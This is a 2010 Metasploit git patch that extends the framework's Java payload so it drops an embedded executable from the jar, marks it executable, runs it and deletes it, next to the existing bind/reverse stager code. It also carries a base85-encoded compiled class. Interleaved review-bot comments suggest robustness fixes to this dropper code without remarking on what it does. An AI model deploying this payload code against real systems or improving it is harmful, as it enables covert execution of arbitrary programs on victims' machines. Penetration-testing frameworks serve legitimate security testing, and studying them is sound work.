From 85640627ab9a06a05c3b5dfd9f0dd9b9e4336bf5 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 10 Nov 2010 19:54:56 +0000 Subject: [PATCH] add ability to drop an executable from the jar. see #406, thanks mihi git-svn-id: file:///home/svn/framework3/trunk@10973 4d416f70-5f16-0410-b530-b9f4589650da --- data/java/metasploit/Payload.class | Bin 7244 -> 8177 bytes .../javapayload/src/metasploit/Payload.java | 65 +++++++++++++++--- 2 files changed, 56 insertions(+), 9 deletions(-) 
diff --git a/data/java/metasploit/Payload.class b/data/java/metasploit/Payload.class index cf7661a2892b2a19ed23bfbda9a450fc5e7f6725..c1e8e9d384174116bbe7705ae68a2a585db92578 100644 GIT binary patch literal 8177 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 0) { // decrease count so that eventually the process // will stop spawning 
@@ -85,15 +101,8 @@ public class Payload extends ClassLoader {
 File classFile = new File(tempDir, clazzFile);
 classFile.getParentFile().mkdirs();
 // load ourselves via the class loader (works both on disk and from Jar)
- InputStream in = clazz.getResourceAsStream("/"+clazzFile);
- FileOutputStream fos = new FileOutputStream(classFile);
- byte[] buf = new byte[4096];
- int len;
- while ((len = in.read(buf)) != -1) {
- fos.write(buf,0,len);
- }
- fos.close();
- fos = new FileOutputStream(propFile);
+ writeEmbeddedFile(clazz, clazzFile, classFile);
+ FileOutputStream fos = new FileOutputStream(propFile);
 props.store(fos, "");
 fos.close();
 Process proc = Runtime.getRuntime().exec(new String[] {
@@ -125,6 +134,33 @@ public class Payload extends ClassLoader {
 Thread.sleep(100);
 }
 }
+ } else if (droppedExecutable != null) {
+ File droppedFile = new File(droppedExecutable);
+ // File.setExecutable is Java 1.6+, therefore call it via reflection and try
+ // the chmod alternative if it fails. Do not call it at all for Windows.
+ if (!IS_DOS) {
+ try {
+ try {
+ File.class.getMethod("setExecutable", new Class[] {boolean.class}).invoke(droppedFile, new Object[] { Boolean.TRUE});
+ } catch (NoSuchMethodException ex) {
+ // ok, no setExecutable method, call chmod and wait for it
+ Runtime.getRuntime().exec(new String[] {"chmod", "+x", droppedExecutable}).waitFor();
+ }
+ } catch (Exception ex) {
+ // try to continue anyway, we have nothing to lose
+ ex.printStackTrace();
+ }
+ }
+
+ // now execute the executable.
+ // tempdir may contain spaces, so do not use the String variant of exec!
+ Runtime.getRuntime().exec(new String[] {droppedExecutable});
+
+ // Linux and other Unices allow removing files while they are in use
+ if (!IS_DOS) {
+ droppedFile.delete();
+ droppedFile.getParentFile().delete();
+ }
 } else {
 // check what stager to use (bind/reverse)
 int lPort = Integer.parseInt(props.getProperty("LPORT", "4444"));
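Review bot: The replacement line `FileOutputStream fos = new FileOutputStream(propFile);` in the first hunk still depends on the unconditional `fos.close();` two lines below it, so if `props.store(fos, "")` throws, the stream stays open and a partially written properties file is left in the temp directory. Change the two lines to `try { props.store(fos, ""); } finally { fos.close(); }`. The enclosing method starts before the hunk and its `exec` call continues past it, so whether a caller cleans up the temp directory on failure is not visible here.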
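Review bot: In the second hunk the reflective `setExecutable` call discards its result, and both a `Boolean.FALSE` return (the permission change failed) and an `InvocationTargetException` wrapping a `SecurityException` land in the outer `catch (Exception ex)`, so the `chmod +x` fallback runs only on JVMs that lack the method entirely and never when the method fails. Capture the result, `Object ok = File.class.getMethod("setExecutable", new Class[] {boolean.class}).invoke(droppedFile, new Object[] { Boolean.TRUE});`, and take the chmod branch when `!Boolean.TRUE.equals(ok)` as well as on `NoSuchMethodException`. The two `if (!IS_DOS)` blocks could share one guard, and the return values of `droppedFile.delete()` and `droppedFile.getParentFile().delete()` are ignored, so a failed cleanup is silent; the parent delete also only succeeds on an empty directory, which the comment should say. The enclosing method begins before the hunk, and where `droppedExecutable` and `IS_DOS` are assigned is not visible in this chunk.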
@@ -160,6 +196,17 @@ public class Payload extends ClassLoader {
 new Payload().bootstrap(in, out, props.getProperty("EmbeddedStage", null),stageParams);
 }
 }
+
+ private static void writeEmbeddedFile(Class clazz, String resourceName, File targetFile) throws FileNotFoundException, IOException {
+ InputStream in = clazz.getResourceAsStream("/"+resourceName);
+ FileOutputStream fos = new FileOutputStream(targetFile);
+ byte[] buf = new byte[4096];
+ int len;
+ while ((len = in.read(buf)) != -1) {
+ fos.write(buf,0,len);
+ }
+ fos.close();
+ }
 private final void bootstrap(InputStream rawIn, OutputStream out, String embeddedStageName, String[] stageParameters) throws Exception {
 try {
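Review bot: `writeEmbeddedFile` never closes `in`, closes `fos` only on the success path, and dereferences the result of `getResourceAsStream` without a null check, so a missing resource ends in a `NullPointerException` after an empty `targetFile` has already been created. Because the surrounding code deliberately avoids Java 1.6 APIs, nested `try`/`finally` rather than try-with-resources is the appropriate fix, with an explicit `FileNotFoundException` for the null case; `FileNotFoundException` is already an `IOException`, so the `throws` clause can shrink to `throws IOException` without changing what callers must catch. A one-line Javadoc, `/** Copies the classpath resource "/" + resourceName into targetFile, overwriting any existing file. */`, would document the contract.
```java
	private static void writeEmbeddedFile(Class clazz, String resourceName, File targetFile) throws IOException {
		InputStream in = clazz.getResourceAsStream("/" + resourceName);
		if (in == null) {
			throw new FileNotFoundException("embedded resource not found: " + resourceName);
		}
		try {
			FileOutputStream fos = new FileOutputStream(targetFile);
			try {
				byte[] buf = new byte[4096];
				int len;
				while ((len = in.read(buf)) != -1) {
					fos.write(buf, 0, len);
				}
			} finally {
				fos.close();
			}
		} finally {
			in.close();
		}
	}
```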